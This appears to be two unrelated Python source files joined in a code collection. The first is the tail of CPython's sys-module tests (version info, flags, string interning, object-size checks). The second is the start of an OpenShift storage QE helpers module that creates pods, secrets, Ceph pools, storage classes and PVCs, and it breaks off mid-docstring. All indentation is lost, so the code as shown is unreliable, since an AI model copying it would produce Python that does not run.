self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
@unittest.skipUnless(hasattr(sys, 'thread_info'),
'Threading required for this test.')
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'os2', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global numruns
numruns += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(numruns)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_user_site", "no_site", "ignore_environment", "verbose",
"bytes_warning", "quiet", "hash_randomization")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
self.assertEqual(type(getattr(sys.flags, attr)), int, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, "\xa2\n".encode("cp424"))
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to an non existent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
elif sys.platform == 'win32':
expected = 'mbcs'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'release': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
self.assertIn(b"free PyDictObjects", err)
class SizeofTest(unittest.TestCase):
TPFLAGS_HAVE_GC = 1<<14
TPFLAGS_HEAPTYPE = 1<<9
def setUp(self):
self.c = len(struct.pack('c', b' '))
self.H = len(struct.pack('H', 0))
self.i = len(struct.pack('i', 0))
self.l = len(struct.pack('l', 0))
self.P = len(struct.pack('P', 0))
# due to missing size_t information from struct, it is assumed that
# sizeof(Py_ssize_t) = sizeof(void*)
self.header = 'PP'
self.vheader = self.header + 'P'
if hasattr(sys, "gettotalrefcount"):
self.header += '2P'
self.vheader += '2P'
self.longdigit = sys.int_info.sizeof_digit
import _testcapi
self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
self.file = open(test.support.TESTFN, 'wb')
def tearDown(self):
self.file.close()
test.support.unlink(test.support.TESTFN)
def check_sizeof(self, o, size):
result = sys.getsizeof(o)
# add GC header size
if ((type(o) == type) and (o.__flags__ & self.TPFLAGS_HEAPTYPE) or\
((type(o) != type) and (type(o).__flags__ & self.TPFLAGS_HAVE_GC))):
size += self.gc_headsize
msg = 'wrong size for %s: got %d, expected %d' \
% (type(o), result, size)
self.assertEqual(result, size, msg)
def calcsize(self, fmt):
"""Wrapper around struct.calcsize which enforces the alignment of the
end of a structure to the alignment requirement of pointer.
Note: This wrapper should only be used if a pointer member is included
and no member with a size larger than a pointer exists.
"""
return struct.calcsize(fmt + '0P')
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
h = self.header
vh = self.vheader
size = self.calcsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), size(vh) + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), size(vh + 'PP') + gc_header_size)
def test_default(self):
h = self.header
vh = self.vheader
size = self.calcsize
self.assertEqual(sys.getsizeof(True), size(vh) + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size(vh) + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
h = self.header
vh = self.vheader
size = self.calcsize
check = self.check_sizeof
# bool
check(True, size(vh) + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size(h + '3P'))
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, size(vh + 'iPP') + x.__alloc__() * self.c)
# bytearray_iterator
check(iter(bytearray()), size(h + 'PP'))
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size(h + 'P'))
# code
check(get_cell().__code__, size(h + '5i9Pi3P'))
# complex
check(complex(0,1), size(h + '2d'))
# method_descriptor (descriptor object)
check(str.lower, size(h + '3PP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size(h + '3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size(h + '3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size(h + '3P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size(h + '2P'))
# dict
check({}, size(h + '3P' + '4P' + 8*'P2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size(h + '3P' + '4P') + 16*size('P2P'))
# dictionary-keyiterator
check({}.keys(), size(h + 'P'))
# dictionary-valueiterator
check({}.values(), size(h + 'P'))
# dictionary-itemiterator
check({}.items(), size(h + 'P'))
# dictproxy
class C(object): pass
check(C.__dict__, size(h + 'P'))
# BaseException
check(BaseException(), size(h + '5Pi'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size(h + '5Pi 2P2PP'))
# UnicodeDecodeError
# XXX
# check(UnicodeDecodeError("", "", 0, 0, ""), size(h + '5P2PP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size(h + '5Pi 2P2PP'))
# ellipses
check(Ellipsis, size(h + ''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size(h + '32B2iB'))
# enumerate
check(enumerate([]), size(h + 'l3P'))
# reverse
check(reversed(''), size(h + 'PP'))
# float
check(float(0), size(h + 'd'))
# sys.floatinfo
check(sys.float_info, size(vh) + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, size(vh + '12P3i' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size(h + '12P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size(h + 'PP'))
# classmethod
check(bar, size(h + 'PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size(h + 'Pi2P'))
# iterator
check(iter('abc'), size(h + 'lP'))
# callable-iterator
import re
check(re.finditer('',''), size(h + '2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(sample, size(vh + 'PP') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size(h + 'lP'))
# listreverseiterator (list)
check(reversed([]), size(h + 'lP'))
# long
check(0, size(vh))
check(1, size(vh) + self.longdigit)
check(-1, size(vh) + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), size(vh) + 2*self.longdigit)
check(int(PyLong_BASE**2-1), size(vh) + 2*self.longdigit)
check(int(PyLong_BASE**2), size(vh) + 3*self.longdigit)
# memoryview
check(memoryview(b''), size(h + 'PPiP4P2i5P3c2P'))
# module
check(unittest, size(h + '3P'))
# None
check(None, size(h + ''))
# NotImplementedType
check(NotImplemented, size(h))
# object
check(object(), size(h + ''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size(h + '4Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size(h + '4l'))
# reverse
check(reversed(''), size(h + 'PP'))
# range
check(range(1), size(h + '4P'))
check(range(66000), size(h + '4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size(h + '3P2P' + PySet_MINSIZE*'lP' + 'lP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*struct.calcsize('lP'))
check(frozenset(sample), s + newsize*struct.calcsize('lP'))
# setiterator
check(iter(set()), size(h + 'P3P'))
# slice
check(slice(0), size(h + '3P'))
# super
check(super(int), size(h + '3P'))
# tuple
check((), size(vh))
check((1,2,3), size(vh) + 3*self.P)
# type
# static type: PyTypeObject
s = size(vh + 'P2P15Pl4PP9PP11PI')
check(int, s)
# (PyTypeObject + PyNumberMethods + PyMappingMethods +
# PySequenceMethods + PyBufferProcs + 4P)
s = size(vh + 'P2P15Pl4PP9PP11PI') + size('34P 3P 10P 2P 4P')
# Separate block for PyDictKeysObject with 4 entries
s += size("PPPP") + 4*size("PPP")
# class
class newstyleclass(object): pass
check(newstyleclass, s)
# dict with shared keys
check(newstyleclass().__dict__, size(h+"PPP4P"))
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = h + "PPiP"
compactfields = asciifields + "PPP"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size(h + '2Pl2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size(h + '2Pl2P'))
def test_pythontypes(self):
# check all types defined in Python/
h = self.header
vh = self.vheader
size = self.calcsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size(h + 'P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb != None:
check(tb, size(h + '2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, size(vh) + self.P * len(sys.flags))
def test_main():
test.support.run_unittest(SysModuleTest, SizeofTest)
if __name__ == "__main__":
test_main()
|
helpers.py
|
"""
Helper functions file for OCS QE
"""
import base64
import random
import datetime
import hashlib
import json
import logging
import os
import re
import statistics
import tempfile
import threading
import time
import inspect
from concurrent.futures import ThreadPoolExecutor
from itertools import cycle
from subprocess import PIPE, run
from uuid import uuid4
from ocs_ci.framework import config
from ocs_ci.helpers.proxy import (
get_cluster_proxies,
update_container_with_proxy_env,
)
from ocs_ci.ocs.utils import mirror_image
from ocs_ci.ocs import constants, defaults, node, ocp
from ocs_ci.ocs.exceptions import (
CommandFailed,
ResourceWrongStatusException,
TimeoutExpiredError,
UnavailableBuildException,
UnexpectedBehaviour,
)
from ocs_ci.ocs.ocp import OCP
from ocs_ci.ocs.resources import pod, pvc
from ocs_ci.ocs.resources.ocs import OCS
from ocs_ci.utility import templating
from ocs_ci.utility.retry import retry
from ocs_ci.utility.utils import (
TimeoutSampler,
ocsci_log_path,
run_cmd,
update_container_with_mirrored_image,
)
logger = logging.getLogger(__name__)
DATE_TIME_FORMAT = "%Y I%m%d %H:%M:%S.%f"
def create_unique_resource_name(resource_description, resource_type):
"""
Creates a unique object name by using the object_description,
object_type and a random uuid(in hex) as suffix trimmed due to
kubernetes limitation of 63 characters
Args:
resource_description (str): The user provided object description
resource_type (str): The type of object for which the unique name
will be created. For example: project, pvc, etc
Returns:
str: A unique name
"""
name = f"{resource_type}-{resource_description[:23]}-{uuid4().hex}"
return name if len(name) < 40 else name[:40]
def create_resource(do_reload=True, **kwargs):
"""
Create a resource
Args:
do_reload (bool): True for reloading the resource following its creation,
False otherwise
kwargs (dict): Dictionary of the OCS resource
Returns:
OCS: An OCS instance
Raises:
AssertionError: In case of any failure
"""
ocs_obj = OCS(**kwargs)
resource_name = kwargs.get("metadata").get("name")
created_resource = ocs_obj.create(do_reload=do_reload)
assert created_resource, f"Failed to create resource {resource_name}"
return ocs_obj
def wait_for_resource_state(resource, state, timeout=60):
"""
Wait for a resource to get to a given status
Args:
resource (OCS obj): The resource object
state (str): The status to wait for
timeout (int): Time in seconds to wait
Raises:
ResourceWrongStatusException: In case the resource hasn't
reached the desired state
"""
if (
resource.name == constants.DEFAULT_STORAGECLASS_CEPHFS
or resource.name == constants.DEFAULT_STORAGECLASS_RBD
):
logger.info("Attempt to default default Secret or StorageClass")
return
try:
resource.ocp.wait_for_resource(
condition=state, resource_name=resource.name, timeout=timeout
)
except TimeoutExpiredError:
logger.error(f"{resource.kind} {resource.name} failed to reach {state}")
resource.reload()
raise ResourceWrongStatusException(resource.name, resource.describe())
logger.info(f"{resource.kind} {resource.name} reached state {state}")
def create_pod(
interface_type=None,
pvc_name=None,
do_reload=True,
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
node_name=None,
pod_dict_path=None,
sa_name=None,
dc_deployment=False,
raw_block_pv=False,
raw_block_device=constants.RAW_BLOCK_DEVICE,
replica_count=1,
pod_name=None,
node_selector=None,
command=None,
command_args=None,
deploy_pod_status=constants.STATUS_COMPLETED,
subpath=None,
):
"""
Create a pod
Args:
interface_type (str): The interface type (CephFS, RBD, etc.)
pvc_name (str): The PVC that should be attached to the newly created pod
do_reload (bool): True for reloading the object after creation, False otherwise
namespace (str): The namespace for the new resource creation
node_name (str): The name of specific node to schedule the pod
pod_dict_path (str): YAML path for the pod
sa_name (str): Serviceaccount name
dc_deployment (bool): True if creating pod as deploymentconfig
raw_block_pv (bool): True for creating raw block pv based pod, False otherwise
raw_block_device (str): raw block device for the pod
replica_count (int): Replica count for deployment config
pod_name (str): Name of the pod to create
node_selector (dict): dict of key-value pair to be used for nodeSelector field
eg: {'nodetype': 'app-pod'}
command (list): The command to be executed on the pod
command_args (list): The arguments to be sent to the command running
on the pod
deploy_pod_status (str): Expected status of deploy pod. Applicable
only if dc_deployment is True
subpath (str): Value of subPath parameter in pod yaml
Returns:
Pod: A Pod instance
Raises:
AssertionError: In case of any failure
"""
if (
interface_type == constants.CEPHBLOCKPOOL
or interface_type == constants.CEPHBLOCKPOOL_THICK
):
pod_dict = pod_dict_path if pod_dict_path else constants.CSI_RBD_POD_YAML
interface = constants.RBD_INTERFACE
else:
pod_dict = pod_dict_path if pod_dict_path else constants.CSI_CEPHFS_POD_YAML
interface = constants.CEPHFS_INTERFACE
if dc_deployment:
pod_dict = pod_dict_path if pod_dict_path else constants.FEDORA_DC_YAML
pod_data = templating.load_yaml(pod_dict)
if not pod_name:
pod_name = create_unique_resource_name(f"test-{interface}", "pod")
pod_data["metadata"]["name"] = pod_name
pod_data["metadata"]["namespace"] = namespace
if dc_deployment:
pod_data["metadata"]["labels"]["app"] = pod_name
pod_data["spec"]["template"]["metadata"]["labels"]["name"] = pod_name
pod_data["spec"]["replicas"] = replica_count
if pvc_name:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["volumes"][0]["persistentVolumeClaim"][
"claimName"
] = pvc_name
else:
pod_data["spec"]["volumes"][0]["persistentVolumeClaim"][
"claimName"
] = pvc_name
if interface_type == constants.CEPHBLOCKPOOL and raw_block_pv:
if pod_dict_path in [constants.FEDORA_DC_YAML, constants.FIO_DC_YAML]:
temp_dict = [
{
"devicePath": raw_block_device,
"name": pod_data.get("spec")
.get("template")
.get("spec")
.get("volumes")[0]
.get("name"),
}
]
if pod_dict_path == constants.FEDORA_DC_YAML:
del pod_data["spec"]["template"]["spec"]["containers"][0][
"volumeMounts"
]
security_context = {"capabilities": {"add": ["SYS_ADMIN"]}}
pod_data["spec"]["template"]["spec"]["containers"][0][
"securityContext"
] = security_context
pod_data["spec"]["template"]["spec"]["containers"][0][
"volumeDevices"
] = temp_dict
elif (
pod_dict_path == constants.NGINX_POD_YAML
or pod_dict == constants.CSI_RBD_POD_YAML
):
temp_dict = [
{
"devicePath": raw_block_device,
"name": pod_data.get("spec")
.get("containers")[0]
.get("volumeMounts")[0]
.get("name"),
}
]
del pod_data["spec"]["containers"][0]["volumeMounts"]
pod_data["spec"]["containers"][0]["volumeDevices"] = temp_dict
else:
pod_data["spec"]["containers"][0]["volumeDevices"][0][
"devicePath"
] = raw_block_device
pod_data["spec"]["containers"][0]["volumeDevices"][0]["name"] = (
pod_data.get("spec").get("volumes")[0].get("name")
)
if command:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["containers"][0]["command"] = command
else:
pod_data["spec"]["containers"][0]["command"] = command
if command_args:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["containers"][0]["args"] = command_args
else:
pod_data["spec"]["containers"][0]["args"] = command_args
if node_name:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["nodeName"] = node_name
else:
pod_data["spec"]["nodeName"] = node_name
if node_selector:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["nodeSelector"] = node_selector
else:
pod_data["spec"]["nodeSelector"] = node_selector
if sa_name and dc_deployment:
pod_data["spec"]["template"]["spec"]["serviceAccountName"] = sa_name
if subpath:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["containers"][0]["volumeMounts"][0][
"subPath"
] = subpath
else:
pod_data["spec"]["containers"][0]["volumeMounts"][0]["subPath"] = subpath
# overwrite used image (required for disconnected installation)
update_container_with_mirrored_image(pod_data)
# configure http[s]_proxy env variable, if required
update_container_with_proxy_env(pod_data)
if dc_deployment:
ocs_obj = create_resource(**pod_data)
logger.info(ocs_obj.name)
assert (ocp.OCP(kind="pod", namespace=namespace)).wait_for_resource(
condition=deploy_pod_status,
resource_name=pod_name + "-1-deploy",
resource_count=0,
timeout=360,
sleep=3,
)
dpod_list = pod.get_all_pods(namespace=namespace)
for dpod in dpod_list:
if "-1-deploy" not in dpod.name:
if pod_name in dpod.name:
return dpod
else:
pod_obj = pod.Pod(**pod_data)
pod_name = pod_data.get("metadata").get("name")
logger.info(f"Creating new Pod {pod_name} for test")
created_resource = pod_obj.create(do_reload=do_reload)
assert created_resource, f"Failed to create Pod {pod_name}"
return pod_obj
def create_project(project_name=None):
"""
Create a project
Args:
project_name (str): The name for the new project
Returns:
ocs_ci.ocs.ocp.OCP: Project object
"""
namespace = project_name or create_unique_resource_name("test", "namespace")
project_obj = ocp.OCP(kind="Project", namespace=namespace)
assert project_obj.new_project(namespace), f"Failed to create namespace {namespace}"
return project_obj
def create_multilpe_projects(number_of_project):
"""
Create one or more projects
Args:
number_of_project (int): Number of projects to be created
Returns:
list: List of project objects
"""
project_objs = [create_project() for _ in range(number_of_project)]
return project_objs
def create_secret(interface_type):
"""
Create a secret
** This method should not be used anymore **
** This method is for internal testing only **
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
Returns:
OCS: An OCS instance for the secret
"""
secret_data = dict()
if interface_type == constants.CEPHBLOCKPOOL:
secret_data = templating.load_yaml(constants.CSI_RBD_SECRET_YAML)
secret_data["stringData"]["userID"] = constants.ADMIN_USER
secret_data["stringData"]["userKey"] = get_admin_key()
interface = constants.RBD_INTERFACE
elif interface_type == constants.CEPHFILESYSTEM:
secret_data = templating.load_yaml(constants.CSI_CEPHFS_SECRET_YAML)
del secret_data["stringData"]["userID"]
del secret_data["stringData"]["userKey"]
secret_data["stringData"]["adminID"] = constants.ADMIN_USER
secret_data["stringData"]["adminKey"] = get_admin_key()
interface = constants.CEPHFS_INTERFACE
secret_data["metadata"]["name"] = create_unique_resource_name(
f"test-{interface}", "secret"
)
secret_data["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
return create_resource(**secret_data)
def default_ceph_block_pool():
"""
Returns default CephBlockPool
Returns:
default CephBlockPool
"""
sc_obj = default_storage_class(constants.CEPHBLOCKPOOL)
cbp_name = sc_obj.get().get("parameters").get("pool")
return cbp_name if cbp_name else constants.DEFAULT_BLOCKPOOL
def create_ceph_block_pool(
pool_name=None, replica=3, compression=None, failure_domain=None, verify=True
):
"""
Create a Ceph block pool
** This method should not be used anymore **
** This method is for internal testing only **
Args:
pool_name (str): The pool name to create
failure_domain (str): Failure domain name
verify (bool): True to verify the pool exists after creation,
False otherwise
replica (int): The replica size for a pool
compression (str): Compression type for a pool
Returns:
OCS: An OCS instance for the Ceph block pool
"""
cbp_data = templating.load_yaml(constants.CEPHBLOCKPOOL_YAML)
cbp_data["metadata"]["name"] = (
pool_name if pool_name else create_unique_resource_name("test", "cbp")
)
cbp_data["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
cbp_data["spec"]["replicated"]["size"] = replica
cbp_data["spec"]["failureDomain"] = failure_domain or get_failure_domin()
if compression:
cbp_data["spec"]["compressionMode"] = compression
cbp_data["spec"]["parameters"]["compression_mode"] = compression
cbp_obj = create_resource(**cbp_data)
cbp_obj.reload()
if verify:
assert verify_block_pool_exists(
cbp_obj.name
), f"Block pool {cbp_obj.name} does not exist"
return cbp_obj
def create_ceph_file_system(pool_name=None):
"""
Create a Ceph file system
** This method should not be used anymore **
** This method is for internal testing only **
Args:
pool_name (str): The pool name to create
Returns:
OCS: An OCS instance for the Ceph file system
"""
cfs_data = templating.load_yaml(constants.CEPHFILESYSTEM_YAML)
cfs_data["metadata"]["name"] = (
pool_name if pool_name else create_unique_resource_name("test", "cfs")
)
cfs_data["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
cfs_data = create_resource(**cfs_data)
cfs_data.reload()
assert validate_cephfilesystem(
cfs_data.name
), f"File system {cfs_data.name} does not exist"
return cfs_data
def default_storage_class(
interface_type,
):
"""
Return default storage class based on interface_type
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
Returns:
OCS: Existing StorageClass Instance
"""
external = config.DEPLOYMENT["external_mode"]
if interface_type == constants.CEPHBLOCKPOOL:
if external:
resource_name = constants.DEFAULT_EXTERNAL_MODE_STORAGECLASS_RBD
else:
resource_name = constants.DEFAULT_STORAGECLASS_RBD
base_sc = OCP(kind="storageclass", resource_name=resource_name)
elif interface_type == constants.CEPHFILESYSTEM:
if external:
resource_name = constants.DEFAULT_EXTERNAL_MODE_STORAGECLASS_CEPHFS
else:
resource_name = constants.DEFAULT_STORAGECLASS_CEPHFS
base_sc = OCP(kind="storageclass", resource_name=resource_name)
base_sc.wait_for_resource(
condition=resource_name,
column="NAME",
timeout=240,
)
sc = OCS(**base_sc.data)
return sc
def default_thick_storage_class():
"""
Return default RBD thick storage class
Returns:
OCS: Existing RBD thick StorageClass instance
"""
external = config.DEPLOYMENT["external_mode"]
if external:
resource_name = constants.DEFAULT_EXTERNAL_MODE_STORAGECLASS_RBD_THICK
else:
resource_name = constants.DEFAULT_STORAGECLASS_RBD_THICK
base_sc = OCP(kind="storageclass", resource_name=resource_name)
sc = OCS(**base_sc.data)
return sc
def create_storage_class(
interface_type,
interface_name,
secret_name,
reclaim_policy=constants.RECLAIM_POLICY_DELETE,
sc_name=None,
provisioner=None,
rbd_thick_provision=False,
encrypted=False,
encryption_kms_id=None,
fs_name=None,
):
"""
Create a storage class
** This method should not be used anymore **
** This method is for internal testing only **
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
interface_name (str): The name of the interface
secret_name (str): The name of the secret
sc_name (str): The name of storage class to create
reclaim_policy (str): Type of reclaim policy. Defaults to 'Delete'
(eg., 'Delete', 'Retain')
rbd_thick_provision (bool): True to enable RBD thick provisioning.
Applicable if interface_type is CephBlockPool
encrypted (bool): True to create encrypted SC else False
encryption_kms_id (str): ID of the KMS entry from connection details
fs_name (str): the name of the filesystem for CephFS StorageClass
Returns:
OCS: An OCS instance for the storage class
"""
yamls = {
constants.CEPHBLOCKPOOL: constants.CSI_RBD_STORAGECLASS_YAML,
constants.CEPHFILESYSTEM: constants.CSI_CEPHFS_STORAGECLASS_YAML,
}
sc_data = dict()
sc_data = templating.load_yaml(yamls[interface_type])
if interface_type == constants.CEPHBLOCKPOOL:
interface = constants.RBD_INTERFACE
sc_data["provisioner"] = (
provisioner if provisioner else defaults.RBD_PROVISIONER
)
if rbd_thick_provision:
sc_data["parameters"]["thickProvision"] = "true"
if encrypted:
# Avoid circular imports
from ocs_ci.utility.kms import get_encryption_kmsid
sc_data["parameters"]["encrypted"] = "true"
sc_data["parameters"]["encryptionKMSID"] = (
encryption_kms_id if encryption_kms_id else get_encryption_kmsid()[0]
)
elif interface_type == constants.CEPHFILESYSTEM:
interface = constants.CEPHFS_INTERFACE
sc_data["parameters"]["fsName"] = fs_name if fs_name else get_cephfs_name()
sc_data["provisioner"] = (
provisioner if provisioner else defaults.CEPHFS_PROVISIONER
)
sc_data["parameters"]["pool"] = interface_name
sc_data["metadata"]["name"] = (
sc_name
if sc_name
else create_unique_resource_name(f"test-{interface}", "storageclass")
)
sc_data["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
for key in ["node-stage", "provisioner", "controller-expand"]:
sc_data["parameters"][f"csi.storage.k8s.io/{key}-secret-name"] = secret_name
sc_data["parameters"][
f"csi.storage.k8s.io/{key}-secret-namespace"
] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data["parameters"]["clusterID"] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data["reclaimPolicy"] = reclaim_policy
try:
del sc_data["parameters"]["userid"]
except KeyError:
pass
return create_resource(**sc_data)
def create_pvc(
sc_name,
pvc_name=None,
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
size=None,
do_reload=True,
access_mode=constants.ACCESS_MODE_RWO,
volume_mode=None,
):
"""
Create a PVC
Args:
sc_name (str): The name of the storage class for the PVC to be
associated with
pvc_name (str): The name of the PVC to create
namespace (str): The namespace for the PVC creation
size (str): Size of pvc to create
